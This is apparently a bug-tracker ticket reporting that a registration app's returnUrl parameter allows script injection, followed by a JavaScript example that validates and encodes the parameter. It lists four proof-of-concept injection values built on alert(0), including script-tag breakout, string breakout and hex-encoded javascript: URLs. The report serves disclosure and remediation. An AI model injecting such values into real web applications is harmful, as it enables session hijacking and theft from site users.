Details

    • Complexity:
      Low

      Description

      Some pages execute code passed in through the returnUrl parameter. An example of such a page is /registrationapp/editSection.page. Here are some values of returnUrl that can lead to code execution, either directly or indirectly:

      Value: </script><script>alert(0)</script><script>
      Result: <script>...window.location='</script><script>alert(0)</script><script>';...</script>
      
      Value: ';})});alert(0);(function(){(function(){'
      Result: ..(..{..(..{..window.location='';})});alert(0);(function(){(function(){'';..}..)..}..)..
      
      Value: javascript:alert(0)
      Result: <a href="javascript:alert(0)"> and another <a href="javascript:alert(0)"> generated programmatically
      
      Value: \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29 (evaluates to javascript:alert(0) as a JavaScript string)
      Result: <a href="javascript:alert(0)"> generated programmatically
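
One way to neutralize the four values above, shown as an added example that is not from the report or the application's code: restrict returnUrl to same-origin, path-absolute targets and encode it for the inline-script context before it is written into the page. `APP_ORIGIN`, the function names and the benign path are assumptions made for illustration.

```javascript
// Added example: hypothetical helpers, not the application's own code.
const APP_ORIGIN = 'https://app.example'; // constructed placeholder origin

// Return `raw` only if it is a same-origin, path-absolute URL; otherwise `fallback`.
function safeReturnUrl(raw, fallback = '/') {
  if (typeof raw !== 'string' || raw === '') return fallback;
  // Control characters and backslashes are rewritten by URL parsers
  // ("/\t/host" and "/\host" both resolve cross-origin), so refuse them outright.
  if (/[\u0000-\u001f\u007f\\]/.test(raw)) return fallback;
  // Exactly one leading slash: rules out "javascript:", "https://", "//host".
  if (!raw.startsWith('/') || raw.startsWith('//')) return fallback;
  let resolved;
  try {
    resolved = new URL(raw, APP_ORIGIN);
  } catch (e) {
    return fallback;
  }
  return resolved.origin === APP_ORIGIN ? raw : fallback;
}

// Encode a value as a JavaScript string literal that is safe inside an inline
// <script> block: JSON.stringify handles quotes, backslashes and newlines;
// the extra escapes stop "</script>" and "<!--" from ending or altering the block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The four returnUrl values listed in the report, plus one constructed benign path.
const REPORTED_VALUES = [
  '</script><script>alert(0)</script><script>',
  "';})});alert(0);(function(){(function(){'",
  'javascript:alert(0)',
  String.raw`\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29`,
];
const BENIGN_VALUE = '/patient/dashboard.page?id=7'; // constructed

// Build the redirect snippet from an untrusted returnUrl: validate, then encode.
function renderRedirectScript(raw) {
  return '<script>window.location=' + jsStringLiteral(safeReturnUrl(raw)) + ';</script>';
}
```

The validated value still needs HTML attribute encoding when it is written into an `href`; validation alone covers the `javascript:` cases, not markup injection through the attribute.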
      

            People

            • Assignee:
              isears Isaac Sears [X] (Inactive)
              Reporter:
              nspin Nick Spinale [X] (Inactive)